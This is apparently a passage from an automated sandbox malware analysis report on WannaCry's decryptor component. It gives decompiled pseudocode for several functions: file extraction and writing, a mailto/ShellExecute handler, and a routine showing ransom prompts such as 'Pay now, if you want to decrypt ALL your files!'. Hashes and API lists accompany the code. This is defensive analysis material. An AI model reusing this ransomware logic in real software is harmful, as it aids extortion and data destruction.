                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$Delete_wcsicmp$Movewcscatwcscpywcsrchr
                                  • String ID: .WNCRY$.WNCYR$.org
                                  • API String ID: 1016768320-4283512309
                                  • Opcode ID: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                  • Instruction ID: 8e688c7c8c2018b5eb76f9bfe5eaf8fc18d5300b1d9ff01e022ce9e0f1e53e02
                                  • Opcode Fuzzy Hash: ca6531dd56d56dd65b8b31a4033326b7c97dce23bd12cfbd58547a94a49b2b6f
                                  • Instruction Fuzzy Hash: 29219576240301ABD220DB15FE49BEB7799DBD4711F44483BF901A2280EB7DD90987BE
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00412360 Relevance: 17.9, APIs: 7, Strings: 3, Instructions: 366COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 95%
                                  			E00412360(signed int __ecx, signed int _a4, void* _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v0;
				char _v260;
				struct _FILETIME _v268;
				struct _FILETIME _v276;
				struct _FILETIME _v284;
				void* _v292;
				void* _v296;
				signed int _v304;
				char _v560;
				struct _OVERLAPPED* _v820;
				void* _v824;
				void* _v827;
				void* _v828;
				long _v829;
				void* _v836;
				intOrPtr _t68;
				long _t77;
				void* _t81;
				void* _t82;
				void* _t90;
				void* _t91;
				long _t94;
				signed int _t97;
				long _t99;
				void* _t106;
				int _t116;
				long _t121;
				signed int _t132;
				signed int _t138;
				unsigned int _t140;
				signed int _t141;
				void* _t154;
				intOrPtr* _t157;
				intOrPtr _t166;
				void* _t174;
				signed int _t175;
				signed int _t176;
				long _t177;
				signed int _t178;
				signed int _t179;
				intOrPtr* _t180;
				void* _t182;
				long _t183;
				intOrPtr* _t185;
				void* _t187;
				void* _t191;
				void* _t192;

				_t166 = _a16;
				_t132 = __ecx;
				if(_t166 == 3) {
					_t68 =  *((intOrPtr*)(__ecx + 4));
					_t176 = _a4;
					__eflags = _t176 - _t68;
					if(_t176 == _t68) {
						L14:
						_t177 = E00411810( *_t132, _a8, _a12,  &_v829);
						__eflags = _t177;
						if(_t177 <= 0) {
							E00411AC0( *_t132);
							 *(_t132 + 4) = 0xffffffff;
						}
						__eflags = _v829;
						if(_v829 == 0) {
							__eflags = _t177;
							if(_t177 <= 0) {
								asm("sbb eax, eax");
								_t77 = 0x1000 + ( ~(_t177 - 0xffffff96) & 0x04fff000);
								__eflags = _t77;
								return _t77;
							} else {
								return 0x600;
							}
						} else {
							__eflags = 0;
							return 0;
						}
					} else {
						__eflags = _t68 - 0xffffffff;
						if(_t68 != 0xffffffff) {
							E00411AC0( *((intOrPtr*)(__ecx)));
							_t187 = _t187 + 4;
						}
						_t81 =  *_t132;
						 *(_t132 + 4) = 0xffffffff;
						__eflags = _t176 -  *((intOrPtr*)(_t81 + 4));
						if(_t176 <  *((intOrPtr*)(_t81 + 4))) {
							__eflags = _t176 -  *((intOrPtr*)(_t81 + 0x10));
							if(_t176 <  *((intOrPtr*)(_t81 + 0x10))) {
								E00411390(_t81);
								_t187 = _t187 + 4;
							}
							_t82 =  *_t132;
							__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							while( *((intOrPtr*)(_t82 + 0x10)) < _t176) {
								E004113E0(_t82);
								_t82 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t82 + 0x10)) - _t176;
							}
							_push( *((intOrPtr*)(_t132 + 0x138)));
							_push( *_t132);
							E00411660();
							_t187 = _t187 + 8;
							 *(_t132 + 4) = _t176;
							goto L14;
						} else {
							return 0x10000;
						}
					}
				} else {
					if(_t166 == 2 || _t166 == 1) {
						_t178 = _t175 | 0xffffffff;
						__eflags =  *(_t132 + 4) - _t178;
						if( *(_t132 + 4) != _t178) {
							E00411AC0( *_t132);
							_t187 = _t187 + 4;
						}
						_t90 =  *_t132;
						 *(_t132 + 4) = _t178;
						_t179 = _a4;
						__eflags = _t179 -  *((intOrPtr*)(_t90 + 4));
						if(_t179 <  *((intOrPtr*)(_t90 + 4))) {
							__eflags = _t179 -  *((intOrPtr*)(_t90 + 0x10));
							if(_t179 <  *((intOrPtr*)(_t90 + 0x10))) {
								E00411390(_t90);
								_t187 = _t187 + 4;
							}
							_t91 =  *_t132;
							__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							while( *((intOrPtr*)(_t91 + 0x10)) < _t179) {
								E004113E0(_t91);
								_t91 =  *_t132;
								_t187 = _t187 + 4;
								__eflags =  *((intOrPtr*)(_t91 + 0x10)) - _t179;
							}
							_t138 = _t132;
							E00411CF0(_t138, _t179,  &_v560);
							__eflags = _v304 & 0x00000010;
							if((_v304 & 0x00000010) == 0) {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t157 = _a8;
									_t185 = _t157;
									_t180 = _t157;
									_t94 =  *_t157;
									__eflags = _t94;
									while(_t94 != 0) {
										__eflags = _t94 - 0x2f;
										if(_t94 == 0x2f) {
											L43:
											_t185 = _t180 + 1;
										} else {
											__eflags = _t94 - 0x5c;
											if(_t94 == 0x5c) {
												goto L43;
											}
										}
										_t94 =  *((intOrPtr*)(_t180 + 1));
										_t180 = _t180 + 1;
										__eflags = _t94;
									}
									asm("repne scasb");
									_t140 =  !(_t138 | 0xffffffff);
									_v828 =  &_v820;
									_t182 = _t157 - _t140;
									_t141 = _t140 >> 2;
									_t97 = memcpy(_v828, _t182, _t141 << 2);
									__eflags = _t185 - _t157;
									memcpy(_t182 + _t141 + _t141, _t182, _t97 & 0x00000003);
									_t191 = _t187 + 0x18;
									if(__eflags != 0) {
										 *((char*)(_t191 + _t185 - _t157 + 0x1c)) = 0;
										_t99 = _v820;
										__eflags = _t99 - 0x2f;
										if(_t99 == 0x2f) {
											L55:
											wsprintfA( &_v260, "%s%s",  &_v820, _t185);
											E00412250(0, _t191 + 0x2c);
											_t187 = _t191 + 0x18;
											goto L48;
										} else {
											__eflags = _t99 - 0x5c;
											if(_t99 == 0x5c) {
												goto L55;
											} else {
												__eflags = _t99;
												if(_t99 == 0) {
													goto L47;
												} else {
													__eflags =  *((char*)(_t191 + 0x1d)) - 0x3a;
													if( *((char*)(_t191 + 0x1d)) != 0x3a) {
														goto L47;
													} else {
														goto L55;
													}
												}
											}
										}
										goto L73;
									} else {
										_v820 = 0;
										L47:
										wsprintfA( &_v260, "%s%s%s", _t132 + 0x140,  &_v820, _t185);
										E00412250(_t132 + 0x140, _t191 + 0x30);
										_t187 = _t191 + 0x1c;
									}
									L48:
									_t174 = CreateFileA(_t187 + 0x260, 0x40000000, 0, 0, 2,  *(_t187 + 0x228), 0);
								} else {
									_t174 = _a8;
								}
								__eflags = _t174 - 0xffffffff;
								if(_t174 != 0xffffffff) {
									_push( *((intOrPtr*)(_t132 + 0x138)));
									_push( *_t132);
									E00411660();
									_t106 =  *(_t132 + 0x13c);
									_t192 = _t187 + 8;
									__eflags = _t106;
									if(_t106 == 0) {
										_push(0x4000);
										L00412CEC();
										_t192 = _t192 + 4;
										 *(_t132 + 0x13c) = _t106;
									}
									_v820 = 0;
									while(1) {
										_t183 = E00411810( *_t132,  *(_t132 + 0x13c), 0x4000, _t192 + 0x13);
										_t192 = _t192 + 0x10;
										__eflags = _t183 - 0xffffff96;
										if(_t183 == 0xffffff96) {
											break;
										}
										__eflags = _t183;
										if(__eflags < 0) {
											L68:
											_v820 = 0x5000000;
										} else {
											if(__eflags <= 0) {
												L63:
												__eflags =  *(_t192 + 0x13);
												if( *(_t192 + 0x13) != 0) {
													SetFileTime(_t174,  &_v276,  &_v284,  &_v268);
												} else {
													__eflags = _t183;
													if(_t183 == 0) {
														goto L68;
													} else {
														continue;
													}
												}
											} else {
												_t116 = WriteFile(_t174,  *(_t132 + 0x13c), _t183, _t192 + 0x18, 0);
												__eflags = _t116;
												if(_t116 == 0) {
													_v820 = 0x400;
												} else {
													goto L63;
												}
											}
										}
										L70:
										__eflags =  *((intOrPtr*)(_t192 + 0x360)) - 1;
										if( *((intOrPtr*)(_t192 + 0x360)) != 1) {
											CloseHandle(_t174);
										}
										E00411AC0( *_t132);
										return _v820;
										goto L73;
									}
									_v820 = 0x1000;
									goto L70;
								} else {
									return 0x200;
								}
							} else {
								__eflags = _t166 - 1;
								if(_t166 != 1) {
									_t154 = _a8;
									_t121 =  *_t154;
									__eflags = _t121 - 0x2f;
									if(_t121 == 0x2f) {
										L36:
										E00412250(0, _t154);
										__eflags = 0;
										return 0;
									} else {
										__eflags = _t121 - 0x5c;
										if(_t121 == 0x5c) {
											goto L36;
										} else {
											__eflags = _t121;
											if(_t121 == 0) {
												L37:
												E00412250(_t132 + 0x140, _t154);
												__eflags = 0;
												return 0;
											} else {
												__eflags =  *((char*)(_t154 + 1)) - 0x3a;
												if( *((char*)(_t154 + 1)) != 0x3a) {
													goto L37;
												} else {
													goto L36;
												}
											}
										}
									}
								} else {
									__eflags = 0;
									return 0;
								}
							}
						} else {
							return 0x10000;
						}
					} else {
						return 0x10000;
					}
				}
				L73:
			}


















































                                  0x0041236a
                                  0x00412371
                                  0x00412376
                                  0x0041239c
                                  0x0041239f
                                  0x004123a6
                                  0x004123a8
                                  0x00412414
                                  0x00412431
                                  0x00412436
                                  0x00412438
                                  0x0041243d
                                  0x00412445
                                  0x00412445
                                  0x00412450
                                  0x00412452
                                  0x00412463
                                  0x00412465
                                  0x00412482
                                  0x0041248b
                                  0x0041248b
                                  0x00412496
                                  0x0041246a
                                  0x00412476
                                  0x00412476
                                  0x00412457
                                  0x00412457
                                  0x00412460
                                  0x00412460
                                  0x004123aa
                                  0x004123aa
                                  0x004123ad
                                  0x004123b2
                                  0x004123b7
                                  0x004123b7
                                  0x004123ba
                                  0x004123bc
                                  0x004123c3
                                  0x004123c6
                                  0x004123da
                                  0x004123dd
                                  0x004123e0
                                  0x004123e5
                                  0x004123e5
                                  0x004123e8
                                  0x004123ea
                                  0x004123ed
                                  0x004123f0
                                  0x004123f5
                                  0x004123f7
                                  0x004123fa
                                  0x004123fa
                                  0x00412407
                                  0x00412408
                                  0x00412409
                                  0x0041240e
                                  0x00412411
                                  0x00000000
                                  0x004123cb
                                  0x004123d7
                                  0x004123d7
                                  0x004123c6
                                  0x00412378
                                  0x0041237b
                                  0x0041249c
                                  0x0041249f
                                  0x004124a1
                                  0x004124a6
                                  0x004124ab
                                  0x004124ab
                                  0x004124ae
                                  0x004124b0
                                  0x004124b3
                                  0x004124ba
                                  0x004124bd
                                  0x004124d1
                                  0x004124d4
                                  0x004124d7
                                  0x004124dc
                                  0x004124dc
                                  0x004124df
                                  0x004124e1
                                  0x004124e4
                                  0x004124e7
                                  0x004124ec
                                  0x004124ee
                                  0x004124f1
                                  0x004124f1
                                  0x004124fd
                                  0x00412501
                                  0x00412506
                                  0x0041250e
                                  0x00412578
                                  0x0041257b
                                  0x00412589
                                  0x00412590
                                  0x00412592
                                  0x00412594
                                  0x00412596
                                  0x00412598
                                  0x0041259a
                                  0x0041259c
                                  0x004125a2
                                  0x004125a2
                                  0x0041259e
                                  0x0041259e
                                  0x004125a0
                                  0x00000000
                                  0x00000000
                                  0x004125a0
                                  0x004125a5
                                  0x004125a8
                                  0x004125a9
                                  0x004125a9
                                  0x004125b8
                                  0x004125ba
                                  0x004125be
                                  0x004125c4
                                  0x004125ca
                                  0x004125cd
                                  0x004125d4
                                  0x004125d6
                                  0x004125d6
                                  0x004125d8
                                  0x0041264d
                                  0x00412652
                                  0x00412656
                                  0x00412658
                                  0x00412671
                                  0x00412684
                                  0x00412691
                                  0x00412696
                                  0x00000000
                                  0x0041265a
                                  0x0041265a
                                  0x0041265c
                                  0x00000000
                                  0x0041265e
                                  0x0041265e
                                  0x00412660
                                  0x00000000
                                  0x00412666
                                  0x00412666
                                  0x0041266b
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041266b
                                  0x00412660
                                  0x0041265c
                                  0x00000000
                                  0x004125da
                                  0x004125da
                                  0x004125df
                                  0x004125f9
                                  0x00412605
                                  0x0041260a
                                  0x0041260a
                                  0x0041260d
                                  0x00412630
                                  0x0041257d
                                  0x0041257d
                                  0x0041257d
                                  0x00412632
                                  0x00412635
                                  0x004126a6
                                  0x004126a7
                                  0x004126a8
                                  0x004126ad
                                  0x004126b3
                                  0x004126b6
                                  0x004126b8
                                  0x004126ba
                                  0x004126bf
                                  0x004126c4
                                  0x004126c7
                                  0x004126c7
                                  0x004126d3
                                  0x004126db
                                  0x004126f4
                                  0x004126f6
                                  0x004126f9
                                  0x004126fc
                                  0x00000000
                                  0x00000000
                                  0x004126fe
                                  0x00412700
                                  0x0041273c
                                  0x0041273c
                                  0x00412702
                                  0x00412702
                                  0x0041271a
                                  0x0041271e
                                  0x00412720
                                  0x0041275f
                                  0x00412722
                                  0x00412722
                                  0x00412724
                                  0x00000000
                                  0x00412726
                                  0x00000000
                                  0x00412726
                                  0x00412724
                                  0x00412704
                                  0x00412714
                                  0x00412716
                                  0x00412718
                                  0x00412732
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00412718
                                  0x00412702
                                  0x00412765
                                  0x00412765
                                  0x0041276d
                                  0x00412770
                                  0x00412770
                                  0x00412779
                                  0x0041278f
                                  0x00000000
                                  0x0041278f
                                  0x00412728
                                  0x00000000
                                  0x0041263a
                                  0x00412646
                                  0x00412646
                                  0x00412510
                                  0x00412510
                                  0x00412513
                                  0x00412524
                                  0x0041252b
                                  0x0041252d
                                  0x0041252f
                                  0x0041253f
                                  0x00412542
                                  0x0041254a
                                  0x00412556
                                  0x00412531
                                  0x00412531
                                  0x00412533
                                  0x00000000
                                  0x00412535
                                  0x00412535
                                  0x00412537
                                  0x00412559
                                  0x00412561
                                  0x00412569
                                  0x00412575
                                  0x00412539
                                  0x00412539
                                  0x0041253d
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0041253d
                                  0x00412537
                                  0x00412533
                                  0x00412518
                                  0x00412518
                                  0x00412521
                                  0x00412521
                                  0x00412513
                                  0x004124c2
                                  0x004124ce
                                  0x004124ce
                                  0x0041238d
                                  0x00412399
                                  0x00412399
                                  0x0041237b
                                  0x00000000

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: %s%s$%s%s%s$:
                                  • API String ID: 0-3034790606
                                  • Opcode ID: 3f912c73aaf125ccd319ec4db5002a1de97c0c32fb0a3ff325c86f975f1c75c1
                                  • Instruction ID: ec0a86814d75b7591ef383b01d603f7b60d36dbaf36e5cde56c141efaaef7cbf
                                  • Opcode Fuzzy Hash: 3f912c73aaf125ccd319ec4db5002a1de97c0c32fb0a3ff325c86f975f1c75c1
                                  • Instruction Fuzzy Hash: 67C138726002045BDB20DF18ED81BEB7398EB85314F04456BFD54CB385D2BDE99A87AA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404280 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 51windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 82%
                                  			E00404280(void* __ecx, char _a8) {
				void* _t9;
				struct HWND__* _t10;
				long _t12;
				long* _t22;
				void* _t24;

				_t24 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x5a)) == 0) {
					E00404530(__ecx);
				}
				_t9 = E004045E0(_t24,  &_a8);
				if(_t9 == 0) {
					L6:
					L00412CBC();
					return _t9;
				} else {
					_t22 = _t24 + 0x44;
					_push(0);
					_push("mailto:");
					L00412DB2();
					if(_t9 != 0) {
						_t9 = ShellExecuteA(0, "open",  *_t22, 0, 0, 1);
						goto L6;
					} else {
						_t10 = GetParent( *(_t24 + 0x20));
						_push(_t10);
						L00412DAC();
						_t12 = SendMessageA( *(_t10 + 0x20), 0x1388,  *(_t24 + 0x20),  *_t22);
						L00412CBC();
						return _t12;
					}
				}
			}








                                  0x00404281
                                  0x00404289
                                  0x0040428b
                                  0x0040428b
                                  0x00404297
                                  0x0040429e
                                  0x004042fd
                                  0x004042ff
                                  0x00404306
                                  0x004042a0
                                  0x004042a0
                                  0x004042a3
                                  0x004042a5
                                  0x004042ac
                                  0x004042b3
                                  0x004042f7
                                  0x00000000
                                  0x004042b5
                                  0x004042bb
                                  0x004042c1
                                  0x004042c2
                                  0x004042d5
                                  0x004042dd
                                  0x004042e4
                                  0x004042e4
                                  0x004042b3

                                  APIs
                                  • #6663.MFC42(mailto:,00000000,?), ref: 004042AC
                                  • GetParent.USER32(?), ref: 004042BB
                                  • #2864.MFC42(00000000), ref: 004042C2
                                  • SendMessageA.USER32(?,00001388,?,?), ref: 004042D5
                                  • #2379.MFC42 ref: 004042DD
                                    • Part of subcall function 00404530: #289.MFC42 ref: 0040455F
                                    • Part of subcall function 00404530: #5789.MFC42(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,004137C8), ref: 00404574
                                    • Part of subcall function 00404530: GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 0040458D
                                    • Part of subcall function 00404530: #5789.MFC42(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004045A6
                                    • Part of subcall function 00404530: #613.MFC42 ref: 004045BB
                                  • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 004042F7
                                  • #2379.MFC42(?), ref: 004042FF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2379#5789$#2864#289#613#6663ExecuteExtentMessageParentPoint32SendShellText
                                  • String ID: mailto:$open
                                  • API String ID: 1144735033-2326261162
                                  • Opcode ID: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                  • Instruction ID: 92cf742add8d60ef6c93fe1e72e53283c618a6078d8cf76be364cef0d5edaefa
                                  • Opcode Fuzzy Hash: 5760831a2f2f2ca95af973a0ffa58b3d14cd67dec606a23a37973cc095c9dbd7
                                  • Instruction Fuzzy Hash: AC0175753003106BD624A761ED46FEF7369AFD4B55F40046FFA41A72C1EAB8A8428A6C
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 004038F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 84windowCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 70%
                                  			E004038F0(void* __ecx, void* __ebp) {
				long _v4;
				intOrPtr _v16;
				char _v1252;
				char _v1284;
				void* __edi;
				int _t20;
				int _t23;
				void* _t30;
				long _t48;
				void* _t50;
				intOrPtr _t53;
				void* _t54;

				_push(0xffffffff);
				_push(E0041367B);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t53;
				_t54 = _t53 - 0x4f8;
				_t50 = __ecx;
				E00403EB0( *[fs:0x0], __ecx, 0);
				_t20 = SendMessageA( *(_t50 + 0xc0), 0x147, 0, 0);
				if(_t20 != 0xffffffff) {
					_t48 = SendMessageA( *(_t50 + 0xc0), 0x150, _t20, 0);
					_t57 =  *((intOrPtr*)(_t48 + 8));
					if( *((intOrPtr*)(_t48 + 8)) == 0) {
						E00403AF0(_t48, __ebp);
					}
					E00401E90( &_v1252, _t57);
					_v4 = 0;
					sprintf( &_v1284, "%08X.dky",  *((intOrPtr*)(_t48 + 8)));
					_t54 = _t54 + 0xc;
					if(E00402020( &_v1252,  &_v1284, E00403810, 0) != 0) {
						_t30 = E00403A20( &_v1252, _t48);
						__eflags = _t30;
						if(_t30 != 0) {
							_push(0);
							_push(0x40);
							_push("All your files have been decrypted!");
							goto L8;
						}
					} else {
						if( *((intOrPtr*)(_t48 + 8)) == 0) {
							_push(0);
							_push(0x40);
							_push("Pay now, if you want to decrypt ALL your files!");
							L8:
							L00412CC8();
						}
					}
					_v4 = 0xffffffff;
					_t20 = E00401F30( &_v1252);
				}
				E00403EB0(_t20, _t50, 1);
				_t23 = CloseHandle( *(_t50 + 0xf4));
				 *(_t50 + 0xf4) = 0;
				 *[fs:0x0] = _v16;
				return _t23;
			}















                                  0x004038f6
                                  0x004038f8
                                  0x004038fd
                                  0x004038fe
                                  0x00403905
                                  0x0040390d
                                  0x00403911
                                  0x0040392c
                                  0x00403931
                                  0x00403948
                                  0x0040394d
                                  0x0040394f
                                  0x00403953
                                  0x00403953
                                  0x0040395c
                                  0x0040396f
                                  0x0040397a
                                  0x00403980
                                  0x0040399a
                                  0x004039b6
                                  0x004039bb
                                  0x004039bd
                                  0x004039bf
                                  0x004039c1
                                  0x004039c3
                                  0x00000000
                                  0x004039c3
                                  0x0040399c
                                  0x004039a1
                                  0x004039a3
                                  0x004039a5
                                  0x004039a7
                                  0x004039c8
                                  0x004039c8
                                  0x004039c8
                                  0x004039a1
                                  0x004039d1
                                  0x004039dc
                                  0x004039dc
                                  0x004039e5
                                  0x004039f1
                                  0x004039fe
                                  0x00403a0a
                                  0x00403a17

                                  APIs
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EBE
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000407,00000000,?,?,00403916,00000000), ref: 00403EC5
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED2
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403ED9
                                    • Part of subcall function 00403EB0: #3092.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EE3
                                    • Part of subcall function 00403EB0: #2642.MFC42(00000002,00000000,00000408,00000000,00000407,00000000,?,?,00403916,00000000), ref: 00403EEA
                                  • SendMessageA.USER32(?,00000147,00000000,00000000), ref: 0040392C
                                  • SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00403946
                                  • sprintf.MSVCRT ref: 0040397A
                                  • #1200.MFC42(All your files have been decrypted!,00000040,00000000,?,00000000,?), ref: 004039C8
                                    • Part of subcall function 00403AF0: fopen.MSVCRT ref: 00403B17
                                    • Part of subcall function 00403A20: GetLogicalDrives.KERNEL32 ref: 00403A35
                                    • Part of subcall function 00403A20: GetDriveTypeW.KERNEL32 ref: 00403A7A
                                    • Part of subcall function 00403A20: GetDiskFreeSpaceExW.KERNEL32(0000005C,?,0000005C,?), ref: 00403A95
                                  • CloseHandle.KERNEL32(?,00000001), ref: 004039F1
                                  Strings
                                  • Pay now, if you want to decrypt ALL your files!, xrefs: 004039A7
                                  • %08X.dky, xrefs: 00403969
                                  • All your files have been decrypted!, xrefs: 004039C3
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #2642#3092$MessageSend$#1200CloseDiskDriveDrivesFreeHandleLogicalSpaceTypefopensprintf
                                  • String ID: %08X.dky$All your files have been decrypted!$Pay now, if you want to decrypt ALL your files!
                                  • API String ID: 139182656-2046724789
                                  • Opcode ID: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                  • Instruction ID: fac117d1ea4493994a32f15f907d1e0ff38d66192023d423f75a73c990ecb755
                                  • Opcode Fuzzy Hash: 1dbeb97ef8e3bee0cd3efc7c8e00841dbdade8396809c06b0445c09d242267da
                                  • Instruction Fuzzy Hash: 1921E670344701ABD220EF25CC02FAB7B98AB84B15F10463EF659A72D0DBBCA5058B9D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00404090 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON
                                  Download Yara Rule
                                  C-Code - Quality: 75%
                                  			E00404090(intOrPtr __ecx) {
				char _v4;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _t16;
				intOrPtr _t34;
				intOrPtr _t39;

				_push(0xffffffff);
				_push(E00413739);
				_t16 =  *[fs:0x0];
				_push(_t16);
				 *[fs:0x0] = _t39;
				_push(__ecx);
				_t34 = __ecx;
				_v16 = __ecx;
				L00412C8C();
				 *((intOrPtr*)(__ecx)) = 0x415d70;
				_v4 = 0;
				L00412DA6();
				_v4 = 1;
				L00412DA6();
				 *((intOrPtr*)(__ecx + 0x4c)) = 0;
				 *((intOrPtr*)(__ecx + 0x48)) = 0x415a30;
				_push(0x421798);
				_v4 = 3;
				 *((intOrPtr*)(__ecx)) = 0x415cb0;
				L00412DA0();
				_push(_t16);
				L00412D9A();
				 *((char*)(__ecx + 0x5a)) = 0;
				 *((char*)(__ecx + 0x58)) = 0;
				 *((char*)(__ecx + 0x59)) = 0;
				 *((intOrPtr*)(_t34 + 0x5c)) = LoadCursorA(0, 0x7f89);
				 *((intOrPtr*)(_t34 + 0x60)) = LoadCursorA(0, 0x7f00);
				 *((intOrPtr*)(_t34 + 0x64)) = 0xff0000;
				 *[fs:0x0] = _v20;
				return _t34;
			}









                                  0x00404090
                                  0x00404092
                                  0x00404097
                                  0x0040409d
                                  0x0040409e
                                  0x004040a5
                                  0x004040a9
                                  0x004040ac
                                  0x004040b0
                                  0x004040b5
                                  0x004040c2
                                  0x004040c6
                                  0x004040ce
                                  0x004040d5
                                  0x004040da
                                  0x004040dd
                                  0x004040e4
                                  0x004040eb
                                  0x004040f0
                                  0x004040f6
                                  0x004040fb
                                  0x004040fe
                                  0x0040410f
                                  0x00404112
                                  0x00404115
                                  0x00404120
                                  0x00404129
                                  0x0040412c
                                  0x00404139
                                  0x00404143

                                  APIs
                                  • #567.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040B0
                                  • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040C6
                                  • #540.MFC42(?,?,?,?,?,?,00413739,000000FF), ref: 004040D5
                                  • #860.MFC42(00421798), ref: 004040F6
                                  • #858.MFC42(00000000,00421798), ref: 004040FE
                                  • LoadCursorA.USER32(00000000,00007F89), ref: 00404118
                                  • LoadCursorA.USER32(00000000,00007F00), ref: 00404123
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000026.00000002.6616350262.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000026.00000002.6616262116.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616491377.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616644430.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616713073.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000026.00000002.6616788501.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_38_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: #540CursorLoad$#567#858#860
                                  • String ID: 0ZA
                                  • API String ID: 2440951079-2594568282
                                  • Opcode ID: 16eebf364e087f87632c2e7a7835be7f4f2429e092200a979286dc3c7585418b
